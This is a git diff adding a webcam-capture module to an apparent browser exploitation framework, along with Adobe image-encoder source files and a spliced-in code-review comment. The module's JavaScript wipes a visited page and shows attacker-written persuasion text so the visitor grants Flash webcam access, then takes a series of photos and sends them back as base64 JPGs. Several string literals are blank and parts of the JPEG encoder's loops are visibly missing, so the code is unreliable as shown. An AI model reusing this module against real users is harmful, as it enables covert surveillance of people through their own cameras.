diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js new file mode 100644 index 000000000..9ed0f73a5 --- /dev/null +++ b/modules/browser/webcam/command.js @@ -0,0 +1,70 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +beef.execute(function() { + + /* + If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons: + - Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox + - There is a bug in flash: http://forums.adobe.com/thread/880967 + - You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the + body_social_engineer_and_overlay below and try again. + */ + + + //The social engineering message and the overlay div's + var body_social_engineer_and_overlay = '

<%= @social_engineering_title %>

<%= @social_engineering_text %>

'; + + + //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string + var js_functions = ''; + + + //Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed) + //We'll notice when flash is not installed anyway... + //var body_flash_container = '

You need FlashPlayer 9 or higher!

Get Adobe Flash player

'; + var body_flash_container = '
'; + + + //The style is the only thing we already append to the head + var theHead = document.getElementsByTagName("head")[0]; + var style = document.createElement('style'); + style.type = 'text/css'; + style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }'; + theHead.appendChild(style); + + //A nice library that helps us to include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + //Empty body first + $j('body').html(''); + //Now show our flash stuff, muahahaha + $j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script); + +}); + + + + + diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml new file mode 100644 index 000000000..98cf7bba3 --- /dev/null +++ b/modules/browser/webcam/config.yaml 
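Review bot: The comment above `js_functions` says "These 4 function names" but then lists five entries with `noCamera()` twice, so it cannot be used to check the callbacks against the ActionScript. It should list each callback name once, verified against the source under `dev/`. Separately, `var swfobject_script = ''` is the only declaration in this function without a terminating semicolon and relies on automatic semicolon insertion; end it with `;` like the others. The contents of the string literals are not visible in this rendering, so this note covers only the comment and the statement terminator.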
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ webcam:
+ enable: true
+ category: "Browser"
+ name: "Webcam"
+ description: "This module will show the Adobe Flash allow webcam dialog to the user. The user has to click the allow button, otherwise this module will not return pictures. The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
+ authors: ["floyd @floyd_ch"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/webcam/dev/com/adobe/images/BitString.as b/modules/browser/webcam/dev/com/adobe/images/BitString.as
new file mode 100755
index 000000000..b5c2b8410
--- /dev/null
+++ b/modules/browser/webcam/dev/com/adobe/images/BitString.as
@@ -0,0 +1,39 @@
+/*
+ Copyright (c) 2008, Adobe Systems Incorporated
+ All rights reserved.
+
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions are
+ met:
+
+ * Redistributions of source code must retain the above copyright notice,
+ this list of conditions and the following disclaimer.
+
+ * Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+
+ * Neither the name of Adobe Systems Incorporated nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+ IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+ THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
+ CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+ EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+ PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+ LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+ NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+package com.adobe.images
+{
+ public class BitString
+ {
+ public var len:int = 0;
+ public var val:int = 0;
+ }
+}
\ No newline at end of file
diff --git a/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as
new file mode 100755
index 000000000..100d7e968
--- /dev/null
+++ b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as
@@ -0,0 +1,648 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.*; + import flash.utils.*; + + /** + * Class that converts BitmapData into a valid JPEG + */ + public class JPGEncoder + { + + // Static table initialization + + private var ZigZag:Array = [ + 0, 1, 5, 6,14,15,27,28, + 2, 4, 7,13,16,26,29,42, + 3, 8,12,17,25,30,41,43, + 9,11,18,24,31,40,44,53, + 10,19,23,32,39,45,52,54, + 20,22,33,38,46,51,55,60, + 21,34,37,47,50,56,59,61, + 35,36,48,49,57,58,62,63 + ]; + + private var YTable:Array = new Array(64); + private var UVTable:Array = new Array(64); + private var fdtbl_Y:Array = new Array(64); + private var fdtbl_UV:Array = new Array(64); + + private function initQuantTables(sf:int):void + { + var i:int; + var t:Number; + var YQT:Array = [ + 16, 11, 10, 16, 24, 40, 51, 61, + 12, 12, 14, 19, 26, 58, 60, 55, + 14, 13, 16, 24, 40, 57, 69, 56, + 14, 17, 22, 29, 51, 87, 80, 62, + 18, 22, 37, 56, 68,109,103, 77, + 24, 35, 55, 64, 81,104,113, 92, + 49, 64, 78, 87,103,121,120,101, + 72, 92, 95, 98,112,100,103, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((YQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + YTable[ZigZag[i]] = t; + } + var UVQT:Array = [ + 17, 18, 24, 47, 99, 99, 99, 99, + 18, 21, 26, 66, 99, 99, 99, 99, + 24, 26, 56, 99, 99, 99, 99, 99, + 47, 66, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((UVQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + UVTable[ZigZag[i]] = t; + } + var aasf:Array = [ + 1.0, 1.387039845, 1.306562965, 1.175875602, + 1.0, 0.785694958, 0.541196100, 0.275899379 + ]; + i = 0; + for (var row:int = 0; row < 8; row++) + { + for (var col:int = 0; col < 8; col++) + { + fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * 
aasf[row] * aasf[col] * 8.0)); + i++; + } + } + } + + private var YDC_HT:Array; + private var UVDC_HT:Array; + private var YAC_HT:Array; + private var UVAC_HT:Array; + + private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array + { + var codevalue:int = 0; + var pos_in_table:int = 0; + var HT:Array = new Array(); + for (var k:int=1; k<=16; k++) { + for (var j:int=1; j<=nrcodes[k]; j++) { + HT[std_table[pos_in_table]] = new BitString(); + HT[std_table[pos_in_table]].val = codevalue; + HT[std_table[pos_in_table]].len = k; + pos_in_table++; + codevalue++; + } + codevalue*=2; + } + return HT; + } + + private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0]; + private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d]; + private var std_ac_luminance_values:Array = [ + 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12, + 0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07, + 0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08, + 0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, + 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16, + 0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28, + 0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39, + 0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, + 0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59, + 0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69, + 0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79, + 0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, + 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98, + 0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7, + 0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6, + 0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, + 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4, + 0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2, + 0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea, + 0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0]; + private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_chrominance_nrcodes:Array 
= [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77]; + private var std_ac_chrominance_values:Array = [ + 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21, + 0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71, + 0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91, + 0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, + 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34, + 0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26, + 0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38, + 0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, + 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58, + 0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68, + 0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78, + 0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, + 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96, + 0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5, + 0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4, + 0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, + 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2, + 0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda, + 0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9, + 0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private function initHuffmanTbl():void + { + YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values); + UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values); + YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values); + UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values); + } + + private var bitcode:Array = new Array(65535); + private var category:Array = new Array(65535); + + private function initCategoryNumber():void + { + var nrlower:int = 1; + var nrupper:int = 2; + var nr:int; + for (var cat:int=1; cat<=15; cat++) { + //Positive numbers + for (nr=nrlower; nr= 0 ) { + if (value & uint(1 << posval) ) { + bytenew |= uint(1 << bytepos); + } + posval--; + bytepos--; + if (bytepos < 0) { + if (bytenew == 0xFF) { + writeByte(0xFF); + writeByte(0); + } + else { + writeByte(bytenew); + } + bytepos=7; + bytenew=0; + } + } + } + + private function writeByte(value:int):void + { + byteout.writeByte(value); + } + + 
private function writeWord(value:int):void + { + writeByte((value>>8)&0xFF); + writeByte((value )&0xFF); + } + + // DCT & quantization core + + private function fDCTQuant(data:Array, fdtbl:Array):Array + { + var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number; + var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number; + var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number; + var i:int; + /* Pass 1: process rows. */ + var dataOff:int=0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+0] + data[dataOff+7]; + tmp7 = data[dataOff+0] - data[dataOff+7]; + tmp1 = data[dataOff+1] + data[dataOff+6]; + tmp6 = data[dataOff+1] - data[dataOff+6]; + tmp2 = data[dataOff+2] + data[dataOff+5]; + tmp5 = data[dataOff+2] - data[dataOff+5]; + tmp3 = data[dataOff+3] + data[dataOff+4]; + tmp4 = data[dataOff+3] - data[dataOff+4]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+4] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+2] = tmp13 + z1; /* phase 5 */ + data[dataOff+6] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+5] = z13 + z2; /* phase 6 */ + data[dataOff+3] = z13 - z2; + data[dataOff+1] = z11 + z4; + data[dataOff+7] = z11 - z4; + + dataOff += 8; /* advance pointer to next row */ + } + + /* Pass 2: process columns. 
*/ + dataOff = 0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+ 0] + data[dataOff+56]; + tmp7 = data[dataOff+ 0] - data[dataOff+56]; + tmp1 = data[dataOff+ 8] + data[dataOff+48]; + tmp6 = data[dataOff+ 8] - data[dataOff+48]; + tmp2 = data[dataOff+16] + data[dataOff+40]; + tmp5 = data[dataOff+16] - data[dataOff+40]; + tmp3 = data[dataOff+24] + data[dataOff+32]; + tmp4 = data[dataOff+24] - data[dataOff+32]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+32] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+16] = tmp13 + z1; /* phase 5 */ + data[dataOff+48] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+40] = z13 + z2; /* phase 6 */ + data[dataOff+24] = z13 - z2; + data[dataOff+ 8] = z11 + z4; + data[dataOff+56] = z11 - z4; + + dataOff++; /* advance pointer to next column */ + } + + // Quantize/descale the coefficients + for (i=0; i<64; i++) { + // Apply the quantization and scaling factor & Round to nearest integer + data[i] = Math.round((data[i]*fdtbl[i])); + } + return data; + } + + // Chunk writing + + private function writeAPP0():void + { + writeWord(0xFFE0); // marker + writeWord(16); // length + writeByte(0x4A); // J + writeByte(0x46); // F + writeByte(0x49); // I + writeByte(0x46); // F + writeByte(0); // = "JFIF",'\0' + writeByte(1); // versionhi + writeByte(1); // versionlo + writeByte(0); // xyunits + writeWord(1); // xdensity + writeWord(1); // ydensity + writeByte(0); // thumbnwidth + writeByte(0); // 
thumbnheight + } + + private function writeSOF0(width:int, height:int):void + { + writeWord(0xFFC0); // marker + writeWord(17); // length, truecolor YUV JPG + writeByte(8); // precision + writeWord(height); + writeWord(width); + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0x11); // HVY + writeByte(0); // QTY + writeByte(2); // IdU + writeByte(0x11); // HVU + writeByte(1); // QTU + writeByte(3); // IdV + writeByte(0x11); // HVV + writeByte(1); // QTV + } + + private function writeDQT():void + { + writeWord(0xFFDB); // marker + writeWord(132); // length + writeByte(0); + var i:int; + for (i=0; i<64; i++) { + writeByte(YTable[i]); + } + writeByte(1); + for (i=0; i<64; i++) { + writeByte(UVTable[i]); + } + } + + private function writeDHT():void + { + writeWord(0xFFC4); // marker + writeWord(0x01A2); // length + var i:int; + + writeByte(0); // HTYDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_luminance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_luminance_values[i]); + } + + writeByte(0x10); // HTYACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_luminance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_luminance_values[i]); + } + + writeByte(1); // HTUDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_chrominance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_chrominance_values[i]); + } + + writeByte(0x11); // HTUACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_chrominance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_chrominance_values[i]); + } + } + + private function writeSOS():void + { + writeWord(0xFFDA); // marker + writeWord(12); // length + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0); // HTY + writeByte(2); // IdU + writeByte(0x11); // HTU + writeByte(3); // IdV + writeByte(0x11); // HTV + writeByte(0); // Ss + writeByte(0x3f); // Se + writeByte(0); // Bf + } + + // Core processing + private var DU:Array = new Array(64); + + private 
function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number + { + var EOB:BitString = HTAC[0x00]; + var M16zeroes:BitString = HTAC[0xF0]; + var i:int; + + var DU_DCT:Array = fDCTQuant(CDU, fdtbl); + //ZigZag reorder + for (i=0;i<64;i++) { + DU[ZigZag[i]]=DU_DCT[i]; + } + var Diff:int = DU[0] - DC; DC = DU[0]; + //Encode DC + if (Diff==0) { + writeBits(HTDC[0]); // Diff might be 0 + } else { + writeBits(HTDC[category[32767+Diff]]); + writeBits(bitcode[32767+Diff]); + } + //Encode ACs + var end0pos:int = 63; + for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) { + }; + //end0pos = first element in reverse order !=0 + if ( end0pos == 0) { + writeBits(EOB); + return DC; + } + i = 1; + while ( i <= end0pos ) { + var startpos:int = i; + for (; (DU[i]==0) && (i<=end0pos); i++) { + } + var nrzeroes:int = i-startpos; + if ( nrzeroes >= 16 ) { + for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) { + writeBits(M16zeroes); + } + nrzeroes = int(nrzeroes&0xF); + } + writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]); + writeBits(bitcode[32767+DU[i]]); + i++; + } + if ( end0pos != 63 ) { + writeBits(EOB); + } + return DC; + } + + private var YDU:Array = new Array(64); + private var UDU:Array = new Array(64); + private var VDU:Array = new Array(64); + + private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void + { + var pos:int=0; + for (var y:int=0; y<8; y++) { + for (var x:int=0; x<8; x++) { + var P:uint = img.getPixel32(xpos+x,ypos+y); + var R:Number = Number((P>>16)&0xFF); + var G:Number = Number((P>> 8)&0xFF); + var B:Number = Number((P )&0xFF); + YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128; + UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B)); + VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B)); + pos++; + } + } + } + + /** + * Constructor for JPEGEncoder class + * + * @param quality The quality level between 1 and 100 that detrmines the + * level of compression used in the generated JPEG + * @langversion ActionScript 
3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function JPGEncoder(quality:Number = 50) + { + if (quality <= 0) { + quality = 1; + } + if (quality > 100) { + quality = 100; + } + var sf:int = 0; + if (quality < 50) { + sf = int(5000 / quality); + } else { + sf = int(200 - quality*2); + } + // Create tables + initHuffmanTbl(); + initCategoryNumber(); + initQuantTables(sf); + } + + /** + * Created a JPEG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the JPEG format. + * @return a ByteArray representing the JPEG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function encode(image:BitmapData):ByteArray + { + // Initialize bit writer + byteout = new ByteArray(); + bytenew=0; + bytepos=7; + + // Add JPEG headers + writeWord(0xFFD8); // SOI + writeAPP0(); + writeDQT(); + writeSOF0(image.width,image.height); + writeDHT(); + writeSOS(); + + + // Encode 8x8 macroblocks + var DCY:Number=0; + var DCU:Number=0; + var DCV:Number=0; + bytenew=0; + bytepos=7; + for (var ypos:int=0; ypos= 0 ) { + var fillbits:BitString = new BitString(); + fillbits.len = bytepos+1; + fillbits.val = (1<<(bytepos+1))-1; + writeBits(fillbits); + } + + writeWord(0xFFD9); //EOI + return byteout; + } + } +} diff --git a/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as new file mode 100755 index 000000000..83c95f629 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as 
@@ -0,0 +1,141 @@
+/*
+ Copyright (c) 2008, Adobe Systems Incorporated
+ All rights reserved.
+
+ Redistribution and use in source and binary forms, with or without
+ modification, are permitted provided that the following conditions are
+ met:
+
+ * Redistributions of source code must retain the above copyright notice,
+ this list of conditions and the following disclaimer.
+
+ * Redistributions in binary form must reproduce the above copyright
+ notice, this list of conditions and the following disclaimer in the
+ documentation and/or other materials provided with the distribution.
+
+ * Neither the name of Adobe Systems Incorporated nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
+ IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
+ THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
+ CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
+ EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
+ PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+ LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
+ NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+package com.adobe.images
+{
+ import flash.geom.*;
+ import flash.display.Bitmap;
+ import flash.display.BitmapData;
+ import flash.utils.ByteArray;
+
+ /**
+ * Class that converts BitmapData into a valid PNG
+ */
+ public class PNGEncoder
+ {
+ /**
+ * Created a PNG image from the specified BitmapData
+ *
+ * @param image The BitmapData that will be converted into the PNG format.
+ * @return a ByteArray representing the PNG encoded image data.
+ * @langversion ActionScript 3.0
+ * @playerversion Flash 9.0
+ * @tiptext
+ */
+ public static function encode(img:BitmapData):ByteArray {
+ // Create output byte array
+ var png:ByteArray = new ByteArray();
+ // Write PNG signature
+ png.writeUnsignedInt(0x89504e47);
+ png.writeUnsignedInt(0x0D0A1A0A);
+ // Build IHDR chunk
+ var IHDR:ByteArray = new ByteArray();
+ IHDR.writeInt(img.width);
+ IHDR.writeInt(img.height);
+ IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA
+ IHDR.writeByte(0);
+ writeChunk(png,0x49484452,IHDR);
+ // Build IDAT chunk
+ var IDAT:ByteArray= new ByteArray();
+ for(var i:int=0;i < img.height;i++) {
+ // no filter
+ IDAT.writeByte(0);
+ var p:uint;
+ var j:int;
+ if ( !img.transparent ) {
+ for(j=0;j < img.width;j++) {
+ p = img.getPixel(j,i);
+ IDAT.writeUnsignedInt(
+ uint(((p&0xFFFFFF) << 8)|0xFF));
+ }
+ } else {
+ for(j=0;j < img.width;j++) {
+ p = img.getPixel32(j,i);
+ IDAT.writeUnsignedInt(
+ uint(((p&0xFFFFFF) << 8)|
+ (p>>>24)));
+ }
+ }
+ }
+ IDAT.compress();
+ writeChunk(png,0x49444154,IDAT);
+ // Build IEND chunk
+ writeChunk(png,0x49454E44,null);
+ // return PNG
+ return png;
+ }
+
+ private static var crcTable:Array;
+ private static var crcTableComputed:Boolean = false;
+
+ private static function writeChunk(png:ByteArray,
+ type:uint, data:ByteArray):void {
+ if (!crcTableComputed) {
+ crcTableComputed = true;
+ crcTable = [];
+ var c:uint;
+ for (var n:uint = 0; n < 256; n++) {
+ c = n;
+ for (var k:uint = 0; k < 8; k++) {
+ if (c & 1) {
+ c = uint(uint(0xedb88320) ^
+ uint(c >>> 1));
+ } else {
+ c = uint(c >>> 1);
+ }
+ }
+ crcTable[n] = c;
+ }
+ }
+ var len:uint = 0;
+ if (data != null) {
+ len = data.length;
+ }
+ png.writeUnsignedInt(len);
+ var p:uint = png.position;
+ png.writeUnsignedInt(type);
+ if ( data != null ) {
+ png.writeBytes(data);
+ }
+ var e:uint = png.position;
+ png.position = p;
+ c = 0xffffffff;
+ for (var i:int = 0; i < (e-p); i++) {
+ c = uint(crcTable[
+ (c ^ png.readUnsignedByte()) &
+ uint(0xff)] ^ uint(c >>> 8));
+ }
+ c = uint(c^uint(0xffffffff));
+ png.position = e;
